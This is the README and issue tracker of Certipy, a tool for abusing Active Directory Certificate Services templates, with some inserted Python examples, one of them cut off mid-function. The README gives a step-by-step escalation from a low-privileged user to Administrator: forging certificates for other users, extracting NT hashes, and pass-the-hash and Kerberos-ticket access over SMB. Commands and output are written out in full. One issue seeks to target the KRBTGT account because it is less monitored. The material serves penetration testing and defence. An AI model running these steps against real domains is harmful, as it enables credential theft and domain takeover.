Python implementation for Active Directory certificate abuse

Overview

Certipy

Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Based on the C# variant Certify from @harmj0y and @tifkin_.

Installation

$ python3 setup.py install

Remember to add the Python scripts directory to your path.

Usage

$ certipy -h
usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
               target {find,req,auth,auto} ...

Active Directory certificate abuse

positional arguments:
  target                [[domain/]username[:password]@]<target name or address>
  {find,req,auth,auto}  Action
    find                Find certificate templates
    req                 Request a new certificate
    auth                Authenticate with a certificate
    auto                Automatically abuse certificate templates for privilege escalation

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
                        cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the
                        NetBIOS name and you cannot resolve it
  -nameserver nameserver
                        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Examples

Auto

Automatically abuse certificate templates for privilege escalation. This action will try to find, request and authenticate as the Administrator user. Upon success, a credential cache will be saved and the NT hash will be decrypted from the PAC in the TGS_REP.

To demonstrate how easy it is to misconfigure certificate templates, the default certificate template Web Server has been copied to Copy of Web Server. The only change was that the EKU Server Authentication was removed and that authenticated users are allowed to enroll. This will allow enrollees to specify the subject and use it for client authentication, i.e. authenticate as any user. If no EKUs are specified, then the certificate can be used for all purposes. Alternatively, one could add the Client Authentication EKU.

In this example, the user john is a low privileged user who is allowed to enroll for the Copy of Web Server template.

$ certipy 'predator/john:[email protected]' auto
[*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'Administrator'
[*] Saved certificate to '1.crt'
[*] Saved private key to '1.key'
[*] Using UPN: '[email protected]'
[*] Trying to get TGT...
[*] Saved credential cache to 'Administrator.ccache'
[*] Trying to retrieve NT hash for '[email protected]'
[*] Got NT hash for '[email protected]': fc525c9683e8fe067095ba2ddc971889

By default, the user Administrator is chosen. Use the -user parameter to create a certificate for another user.

Find

The find action will find certificate templates that are enabled by one or more CAs.

Find vulnerable templates

Use the -vulnerable parameter to only find vulnerable certificate templates.

$ certipy 'predator/john:[email protected]' find -vulnerable
[*] Finding vulnerable certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Vulnerable Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
    Vulnerable Reasons                  : 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication
                                          'Authenticated Users' can enroll and template has dangerous EKU

Use the -user parameter to find vulnerable certificate templates for another user. By default, the current user will be used.
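The following Python is an added example, not code from Certipy or its README. It parses the text layout of the find output shown above into per-template records and re-derives the 'Vulnerable Reasons' lines from the same conditions the output spells out: a low-privileged group can enroll, the enrollee supplies the subject, and the EKU list either allows client authentication or is empty (which makes the certificate valid for any purpose). It goes slightly beyond this section by also honouring the CA's User Specified SAN setting, which the request section later relies on for -alt. The embedded sample output, the list of low-privileged groups, the EKU names and the PendAllRequests flag name are assumptions of this example, not values taken from a real domain.

```python
import re

# Constructed sample in the layout of Certipy's 'find' text output (CA and
# template sections only); it is not output captured from a real domain.
SAMPLE_FIND_OUTPUT = """\
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    User Specified SAN                  : Disabled
Certificate Templates
  0
    Template Name                       : User
    Certificate Name Flag               : SubjectRequireDirectoryPath
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Encrypting File System
                                          Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\\Domain Admins
                                          predator\\Domain Users
  1
    Template Name                       : Copy of Web Server
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  :
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\\Domain Admins
                                          Authenticated Users
"""

# Groups that every ordinary user or machine account belongs to (assumed list).
LOW_PRIV = {"authenticated users", "domain users", "domain computers", "everyone"}
# EKUs under which a certificate is accepted for client authentication (PKINIT).
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication", "Smart Card Logon", "Any Purpose"}
KEY_VALUE = re.compile(r"^\s+(\S.*?)\s+:\s*(.*?)\s*$")  # "    Key     : value"
INDEX_LINE = re.compile(r"^\s*\d+\s*$")                  # "  0" starts a block
CONTINUATION = " " * 40   # extra values are aligned under the first one


def parse_find_output(text):
    """Return {section: [block, ...]}; each block maps a key to its list of values."""
    sections, blocks, block, key = {}, None, None, None
    for line in text.splitlines():
        if line and not line[0].isspace():            # unindented line: new section
            blocks, block = sections.setdefault(line.strip(), []), None
        elif INDEX_LINE.match(line) and blocks is not None:
            block, key = {}, None
            blocks.append(block)
        elif block is None:
            continue
        elif (m := KEY_VALUE.match(line)):
            key = m.group(1)
            block[key] = [m.group(2)] if m.group(2) else []
        elif line.startswith(CONTINUATION) and key:   # sub-headers such as "Permissions" are skipped
            block[key].append(line.strip())
    return sections


def short_name(principal):                            # 'predator\\Domain Users' -> 'Domain Users'
    return principal.split("\\", 1)[-1]


def vulnerable_reasons(template, ca_allows_san=False):
    """Reproduce the 'Vulnerable Reasons' lines of the find action for one template."""
    enrollers = [p for p in template.get("Enrollment Rights", [])
                 if short_name(p).lower() in LOW_PRIV]
    # "PendAllRequests" is assumed to be the manager-approval flag name as Certipy prints it.
    needs_approval = "PendAllRequests" in template.get("Enrollment Flag", [])
    signatures = int((template.get("Authorized Signatures Required") or ["0"])[0])
    if not enrollers or needs_approval or signatures > 0:
        return []                                      # not self-service for low-priv users
    ekus = template.get("Extended Key Usage", [])
    allows_auth = not ekus or bool(set(ekus) & AUTH_EKUS)   # no EKU at all = any purpose
    who = ", ".join(f"'{short_name(p)}'" for p in enrollers)
    reasons = []
    if allows_auth and "EnrolleeSuppliesSubject" in template.get("Certificate Name Flag", []):
        reasons.append(f"{who} can enroll, enrollee supplies subject and template allows authentication")
    if allows_auth and ca_allows_san:                  # CA-side setting: -alt works on any auth template
        reasons.append(f"{who} can enroll, template allows authentication and CA allows user specified SAN")
    if not ekus or "Any Purpose" in ekus:
        reasons.append(f"{who} can enroll and template has dangerous EKU")
    return reasons


def audit(text):
    """Map every template name to its reasons; the CA's SAN setting applies to all templates."""
    found = parse_find_output(text)
    ca_allows_san = any(ca.get("User Specified SAN") == ["Enabled"]
                        for ca in found.get("Certificate Authorities", []))
    return {t["Template Name"][0]: vulnerable_reasons(t, ca_allows_san)
            for t in found.get("Certificate Templates", [])}


if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_FIND_OUTPUT).items():
        print(name, "->", reasons or "no ESC1/ESC2/ESC6 conditions found")
```

Running the block prints one line per template; for a real audit, feed audit() the saved text of a certipy find run instead of the sample. The default User template is reported clean until the CA's User Specified SAN is Enabled, at which point every template that allows client authentication and low-privileged enrollment becomes a finding, which is the ESC6 case raised in the issues further down.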

Find all templates

$ certipy 'predator/john:[email protected]' find
[*] Finding certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : User
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectRequireEmail
                                          SubjectAltRequireEmail
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
                                          IncludeSymmetricAlgorithms
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Domain Users
                                          predator\Enterprise Admins
      Object Control Permissions
        Owner                           : predator\Enterprise Admins
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
[...]
  11
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator

Request

Request a new certificate from a certificate template. By default, the current user specified in the target parameter will be used.

Request as another user

To request a certificate as another user, use the -alt parameter. This only applies to certificate templates where the enrollee specifies the subject, or when the CA allows the enrollee to specify a UPN, i.e. User Specified SAN is set to Enabled.

In this example, the user john is a low privileged user. The certificate template Copy of Web Server is a copy of the default Web Server template. The EKU Server Authentication was removed, such that the template has no EKUs (No EKUs = any purpose). The default Web Server template allows the enrollee to supply the subject.

john will request a certificate valid for authentication as jane. The CA predator-DC-CA has Copy of Web Server enabled.

$ certipy 'predator/john:[email protected]' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'jane'
[*] Saved certificate to '2.crt'
[*] Saved private key to '2.key'

The certificate and key will be DER encoded and saved to <request ID>.(crt|key), where the request ID is returned by the server.

Request as self

It is also possible to request a certificate for the current user. This is a good option for persistence since a certificate is not affected by password changes. By default, domain users are allowed to enroll in the default User template.

$ certipy 'predator/john:[email protected]' req -template 'User' -ca 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN '[email protected]'
[*] Saved certificate to '3.crt'
[*] Saved private key to '3.key'

Authenticate

The auth action will use the PKINIT Kerberos extension to authenticate with the provided certificate. The target user is taken from the target parameter; if it is not specified there, Certipy will try to extract the UPN from the certificate. The TGT will be saved in a credential cache at <username>.ccache.

The NT hash will be extracted by using Kerberos U2U to request a TGS for the current user, where the encrypted PAC will contain the NT hash, which can be decrypted.

$ certipy 'predator/[email protected]' auth -cert ./2.crt -key ./2.key
[*] Using UPN: '[email protected]'
[*] Trying to get TGT...
[*] Saved credential cache to 'jane.ccache'
[*] Trying to retrieve NT hash for '[email protected]'
[*] Got NT hash for '[email protected]': 077cccc23f8ab7031726a3b70c694a49

Using the NT hash

You can simply pass-the-hash (PTH) to many services. For instance, SMB:

$ impacket-smbclient -hashes :fc525c9683e8fe067095ba2ddc971889 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: administrator, active:     1, idle:     0

Using the credential cache

The credential cache currently holds a TGT. The TGT can be used to request TGSs for services. For instance, to request a TGS for the cifs (SMB) service at dc.predator.local:

$ # use TGT from Certipy
$ export KRB5CCNAME=./Administrator.ccache
$ # request TGS
$ impacket-getST -spn 'cifs/dc.predator.local' -dc-ip 172.16.19.100 -no-pass -k 'predator/administrator'
$ # use TGS from impacket-getST
$ export KRB5CCNAME=./administrator.ccache
$ # run smbclient with TGS (notice the FQDN)
$ impacket-smbclient -k -no-pass 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: Administrator, active:     1, idle:     0

Note that impacket-getST will overwrite the credential cache at <username>.ccache. Create a copy of the credential cache from Certipy before requesting a TGS with impacket-getST.

Errors

Please submit any errors, issues, or questions under "Issues". A lot of errors can be caused by the user, tool, and target, but the error handling is not perfect.

Credits

Issues
  • Formatting question for "ESC1 - SAN Impersonation" attack

    Hello!

    I've got an environment where I've run the Certipy enumeration and have a template vulnerable to ESC1. I've requested a TGT for my "standard" user using GetTGT from impacket. And then I've launched Certipy as follows:

    certipy 'NETBIOS-NAME-OF-DOMAIN/[email protected]' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req template 'VULNERABLETEMPLATE' -ca 'CA-NAME' -alt 'DOMAIN-ADMIN'
    

    When this runs, I get:

    [+] Trying to resolve 'VULN-CA-SERVER' at 'IP-OF-DC'
    [+] Connecting to SMB at 'VULN-CA-SERVER' 
    [+] Using Kerberos Cache: regularuser.ccache
    [+] SPN CIFS/[email protected] not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] SPN KRBTGT/[email protected] not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] No valid credentials found in cache.
    

    This is followed by a traceback and tons of python errors. Do I have a syntax error? I'm not sure what the expected output should look like.

    Thanks, Brian

    opened by braimee 7
  • resolve an issue if a user supplies a userPrincipalName (longer than 20 characters)

    The connection methods assume a samAccountName (which is limited to 20 characters); in case of a user submitting a userPrincipalName, we need to limit its length to 20 characters in order to obtain the samAccountName.

    opened by offensity 5
  • ESC2 and ESC3 - "The data is invalid. 0x8007000d (WIN32: 13 ERROR_INVALID_DATA)".

    Hi. I am testing the new version of your great tool. Unfortunately I get an error when testing the ESC2 and ESC3 attacks. Note that I can successfully exploit ESC1.

    ESC2 attack. The template "ESC2" is configured with the EKU "Any Purpose". First I request a certificate for domainuser1 (low priv.). The resulting certificate will act as the enrollment agent in the next step.

    Then I use the file "domainuser1.pfx" to request a certificate for Administrator but then I get the error. The template "User" is configured as per default. Don't mind the different request IDs, I caused that.

    ESC3 attack. The template "ESC3" is configured with the EKU "Certificate Request Agent". First I request a certificate for domainuser1 (low priv.). The resulting certificate will act as the enrollment agent in the next step.

    Then I use the file "domainuser1.pfx" to request a certificate for Administrator but then I get the error. The template "User" is configured as per default. Again, don't mind the different request IDs...

    opened by jsdhasfedssad 5
  • ValueError: nameserver None is not an IP address or valid https URL

    Hello! I'm trying to dump the AD with bloodhound and the find action, but I have this error. Tested on a recently installed Kali Linux 2022.1 with Python 3.9.10.

    [-] Got error: nameserver None is not an IP address or valid https URL
    Traceback (most recent call last):
      File "/usr/lib/python3/dist-packages/dns/resolver.py", line 982, in nameservers
        raise NotImplementedError
    NotImplementedError

    and the command is: certipy find 'domain/user:[email protected]' -debug -bloodhound
    I have tried with the FQDN and with the name only of the DC, with the same results. If I ping using the names, it works without issues.

    Thanks in advance.

    opened by proyecto-gemyn 5
  • TypeError: 'type' object is not subscriptable

    I installed as local user on Windows 10 using Python38. I tried running 'certipy -h' and this error resulted. Please advise. Full console output:

    Traceback (most recent call last):
      File "C:\Users\<redacted>\AppData\Roaming\Python\Python38\Scripts\certipy-script.py", line 33, in <module>
        sys.exit(load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')())
      File "C:\Users\<redacted>\AppData\Roaming\Python\Python38\Scripts\certipy-script.py", line 25, in importlib_load_entry_point
        return next(matches).load()
      File "C:\Program Files\Python38\lib\importlib\metadata.py", line 77, in load
        module = import_module(match.group('module'))
      File "C:\Program Files\Python38\lib\importlib\__init__.py", line 127, in import_module
        return _bootstrap._gcd_import(name[level:], package, level)
      File "", line 1014, in _gcd_import
      File "", line 991, in _find_and_load
      File "", line 975, in _find_and_load_unlocked
      File "", line 655, in _load_unlocked
      File "", line 618, in _load_backward_compatible
      File "", line 259, in load_module
      File "C:\Users\<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\entry.py", line 16, in <module>
      File "", line 991, in _find_and_load
      File "", line 975, in _find_and_load_unlocked
      File "", line 655, in _load_unlocked
      File "", line 618, in _load_backward_compatible
      File "", line 259, in load_module
      File "C:\Users\<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\auto.py", line 17, in <module>
      File "", line 991, in _find_and_load
      File "", line 975, in _find_and_load_unlocked
      File "", line 655, in _load_unlocked
      File "", line 618, in _load_backward_compatible
      File "", line 259, in load_module
      File "C:\Users\<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\find.py", line 25, in <module>
      File "", line 991, in _find_and_load
      File "", line 975, in _find_and_load_unlocked
      File "", line 655, in _load_unlocked
      File "", line 618, in _load_backward_compatible
      File "", line 259, in load_module
      File "C:\Users\<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\constants.py", line 20, in <module>
      File "", line 991, in _find_and_load
      File "", line 975, in _find_and_load_unlocked
      File "", line 655, in _load_unlocked
      File "", line 618, in _load_backward_compatible
      File "", line 259, in load_module
      File "C:\Users\<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\structs.py", line 12, in <module>
      File "", line 991, in _find_and_load
      File "", line 975, in _find_and_load_unlocked
      File "", line 655, in _load_unlocked
      File "", line 618, in _load_backward_compatible
      File "", line 259, in load_module
      File "C:\Users\<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\formatting.py", line 11, in <module>
    TypeError: 'type' object is not subscriptable

    opened by bill-e-ghote 4
  • "UnboundLocalError: local variable 'tgt' referenced before assignment" error when requesting a TGT for the Kerberos account KRBTGT

    Hi,

    At the top of the below screenshot you can see a successful request for a certificate for the Kerberos account KRBTGT. However, when attempting to authenticate using that certificate in order to get the NT hash of the account, the error "UnboundLocalError: local variable 'tgt' referenced before assignment" occurs.

    At the bottom of the screenshot you see the same but for the account Administrator which works.

    It would be nice to be able to target the Kerberos account since that is typically less monitored and its password is typically rarely changed.

    Thanks!


    bug good first issue 
    opened by jsdhasfeds 4
  • "argument of type 'NoneType' is not iterable" for enabled templates

    Hi,

    First of all, thanks for your awesome tool. I'm trying to use it but I get the following error. Any idea on what could be going wrong ?

    └─# 
    Certipy v2.0.5 - by Oliver Lyak (ly4k)
    
    [*] Finding certificate templates
    [+] Authenticating to LDAP server
    [+] Authenticating to LDAP server
    [+] Bound to ldaps://192.168.x.x - ssl
    [+] Default path: DC=domain,DC=local
    [+] Configuration path: CN=Configuration,DC=domain,DC=local
    [*] Found 33 certificate templates
    [*] Finding certificate authorities
    [*] Found 2 certificate authorities
    [-] Got error: argument of type 'NoneType' is not iterable
    Traceback (most recent call last):
      File "/usr/local/lib/python3.9/dist-packages/Certipy-2.0.5-py3.9.egg/certipy/entry.py", line 62, in main
        actions[options.action](options)
      File "/usr/local/lib/python3.9/dist-packages/Certipy-2.0.5-py3.9.egg/certipy/find.py", line 734, in entry
        find.find()
      File "/usr/local/lib/python3.9/dist-packages/Certipy-2.0.5-py3.9.egg/certipy/find.py", line 145, in find
        if template.get("name") in templates:
    TypeError: argument of type 'NoneType' is not iterable
    
    opened by frisch-raphael 4
  • TypeError: 'type' object is not subscriptable

    When running certipy I'm getting the following:

    # certipy
    Traceback (most recent call last):
      File "/usr/local/bin/certipy", line 11, in <module>
        load_entry_point('Certipy==2.0', 'console_scripts', 'certipy')()
      File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 490, in load_entry_point
        return get_distribution(dist).load_entry_point(group, name)
      File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 2854, in load_entry_point
        return ep.load()
      File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 2445, in load
        return self.resolve()
      File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 2451, in resolve
        module = __import__(self.module_name, fromlist=['__name__'], level=0)
      File "/usr/local/lib/python3.8/dist-packages/Certipy-2.0-py3.8.egg/certipy/entry.py", line 8, in <module>
        from certipy import auth, ca, find, forge, relay, request, shadow, template, version
      File "/usr/local/lib/python3.8/dist-packages/Certipy-2.0-py3.8.egg/certipy/shadow.py", line 22, in <module>
        class Shadow:
      File "/usr/local/lib/python3.8/dist-packages/Certipy-2.0-py3.8.egg/certipy/shadow.py", line 54, in Shadow
        def get_key_credentials(self, target_dn: str, user: LDAPEntry) -> list[bytes]:
    TypeError: 'type' object is not subscriptable
    
    
    opened by mubix 4
  • Another command syntax question re "ESC1 - SAN impersonation" attack

    Hi again,

    I raised this issue and it was determined the certificate service was not running on my CA.

    On a second CA in the same environment, Certipy identified it as being vulnerable to ESC1 - SAN impersonation attack. Specifically, Domain Computers can enroll. I used Powermad to create a "ghost" computer object. Then I used GetTGT from Impacket and issued export KRB5CCNAME=ghost-machine.cache.. I also verified with rpcdump that certsrv.exe is running.

    What I'm now trying to run with Certipy is as follows:

    certipy 'domain.com/[email protected] -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req -template 'TEMPLATE' -ca 'CA-NAME-AND-*NOT*-THE-DNS-NAME' -altname 'Administrator'
    

    When I do, I basically get the same output as issue 19 with a long traceback that ends in:

    impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
    

    Again, the difference this time around is I believe the certificate services are running so I'm not sure why my attempts are not successful. Could you please help?

    Thanks, Brian

    opened by braimee 4
  • Tag releases

    Could you please tag the source? This allows distributions to get the complete source from GitHub and version the packages properly (e.g., https://github.com/NixOS/nixpkgs/pull/145126).

    Thanks

    opened by fabaff 4
  • AttributeError: 'Namespace' object has no attribute 'json'

    Please tell me: my current environment is Python 3.9. When I execute certipy 'test/join:[email protected]' auto, the following error appears. Is there any solution?

    Traceback (most recent call last):
      File "/usr/local/bin/certipy", line 33, in <module>
        sys.exit(load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')())
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/entry.py", line 176, in main
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/auto.py", line 29, in auto
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/find.py", line 474, in __init__
    AttributeError: 'Namespace' object has no attribute 'json'

    opened by helloyw 4
  • Missing continue in exception (find)

    If exception is fired looping through enrollment_services, EnrollmentService constructor should not be called as it will certainly also crash.

    opened by brouillamini 3
  • consolidate vulnerable reasons for has vulnerable acl

    Currently the has_vulnerable_acl is the only method adding multiple entries into _vulnerable_reasons for the same reason (with different usernames)

    opened by offensity 3
  • Which abuse scenarios are supported by this tool?

    Hi. Thank you very much for your effort writing this tool. I have successfully used it in the scenarios with technique IDs ESC1 and ESC2 in Will Schroeder's and Lee Christensen's whitepaper. Both manually and automatically. I have a few questions:

    1. In automatic mode, can you force the use of a specific certificate template? This is not really needed but could be valuable in penetration testing reports in order to "prove" that specific templates are vulnerable. I could of course abuse them manually but now that your tool has this nice automatic feature I want to use that :)

    2. Which other scenarios are supported by this tool? For example technique ID ESC6. If not, are you planning to implement this? FYI, Certi.py does not support ESC6, which forces you to use Rubeus on a domain-joined machine, which is far from optimal and not something I really want to do.

    opened by jsdhasfeds 2
  • Fix type cast v2

    list -> List

    opened by mubix 2
  • RRP SessionError: code 0x2

    Hi, I just tried certipy and I have some issues to find and get bloodhound output. It correctly finds multiple certificate templates and 4 certificate authorities, then tries to connect to all of them, 3 work, and one fails with the following:

    [-] Got error: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
    Traceback (most recent call last):
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\certipy\entry.py", line 62, in main
        actions[options.action](options)
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\certipy\find.py", line 813, in entry
        find.find()
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\certipy\find.py", line 156, in find
        edit_flags, request_disposition, security = self.get_ca_security(
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\certipy\find.py", line 686, in get_ca_security
        policy_key = rrp.hBaseRegOpenKey(
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\impacket-0.9.24-py3.10.egg\impacket\dcerpc\v5\rrp.py", line 874, in hBaseRegOpenKey
        return dce.request(request)
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\impacket-0.9.24-py3.10.egg\impacket\dcerpc\v5\rpcrt.py", line 880, in request
        raise exception
    impacket.dcerpc.v5.rrp.DCERPCSessionError: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
    

    The CA server has to do something with skype for business I guess, don't know if that helps.

    Does it actually have to enumerate all servers?

    opened by CT-H00K 2
  • Fix: 'Namespace' object has no attribute 'json'

    When running the script with the auto mode, a Find object is created without the -json parameter. Hence, the attribute isn't present in the argparse namespace. A check is needed to differentiate when launched in find mode or auto mode. Here is the stacktrace:

    This is a quickfix by looking before if the object options has a json attribute. It seems to be the only occurrence of checking the self.options.json object when launched in the auto mode, so it could also be done by modifying the next line like so:

    if hasattr(self.options, "json") and self.options.json
    

    I don't know, you tell me !

    opened by Clayno 1
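An added example (not Certipy's code) reproducing the argparse behaviour behind this PR: an option declared only on the `find` subparser is absent from the namespace whenever `auto` is the chosen action, so either the `hasattr` guard from the PR or a parent-level `set_defaults` is needed. The parser, `run`, and `wants_json` are stand-ins built for this example.

```python
import argparse


def build_parser(with_defaults=False):
    """Stand-in CLI where -json exists only on the `find` action."""
    parser = argparse.ArgumentParser(prog="tool")
    actions = parser.add_subparsers(dest="action", required=True)
    find = actions.add_parser("find")
    find.add_argument("-json", action="store_true", help="emit JSON")
    actions.add_parser("auto")  # no -json option on this action
    if with_defaults:
        # Alternative fix: make the attribute exist for every action.
        parser.set_defaults(json=False)
    return parser


def wants_json(options):
    """The guard from the PR: tolerate a namespace that has no `json`."""
    return hasattr(options, "json") and bool(options.json)


def run(argv, with_defaults=False):
    """Parse argv and report whether `json` exists and what the guard returns."""
    options = build_parser(with_defaults).parse_args(argv)
    return {
        "action": options.action,
        "has_attr": hasattr(options, "json"),
        "json": wants_json(options),
    }


if __name__ == "__main__":
    print(run(["auto"]))                 # no `json` attribute, guard returns False
    print(run(["find", "-json"]))        # attribute present and True
    print(run(["auto"], with_defaults=True))
```

Without the guard, `options.json` raises `AttributeError: 'Namespace' object has no attribute 'json'` for the `auto` action; with `set_defaults` on the top-level parser the attribute is always present, which is the cleaner fix when more than one place reads it.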
  • Fallback on default naming context when root naming context not avail…

    Fallback on default naming context when root naming context not avail…

    …able

    When querying, the root naming context (top level domain) is used instead of the default one. In some cases, such as a child domain in a forest, we don't have access to the root domain, so trying to query the root naming context will result in raising an error: "Could not find domain DC=contenso,DC=com".

    Here we still try to go for the root domain, but fallback on the default if it doesn't work. It may be nice to also add an option to specify the path we want to work with.

    opened by Clayno 1
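An added example (not Certipy's code) of the fallback this PR describes: try the forest root naming context first and fall back to the domain's default naming context when the root domain cannot be searched, as happens for a user in a child domain. `root_dse` is a constructed rootDSE dictionary and `probe` is a stand-in for a base-scoped LDAP search; both are this example's own. It also shows the forest-wide Configuration naming context under which the PKI objects (templates and enrollment services) live on every DC.

```python
class NamingContextError(Exception):
    """Raised when none of the candidate naming contexts can be searched."""


def pick_naming_context(root_dse, probe, prefer_root=True):
    """Return the first naming context that `probe` can search.

    Order: rootDomainNamingContext (forest root) first, then
    defaultNamingContext (the domain we authenticated to), so a child-domain
    user still gets a usable base when the root domain is unreachable.
    """
    candidates = []
    if prefer_root:
        candidates.append(root_dse.get("rootDomainNamingContext"))
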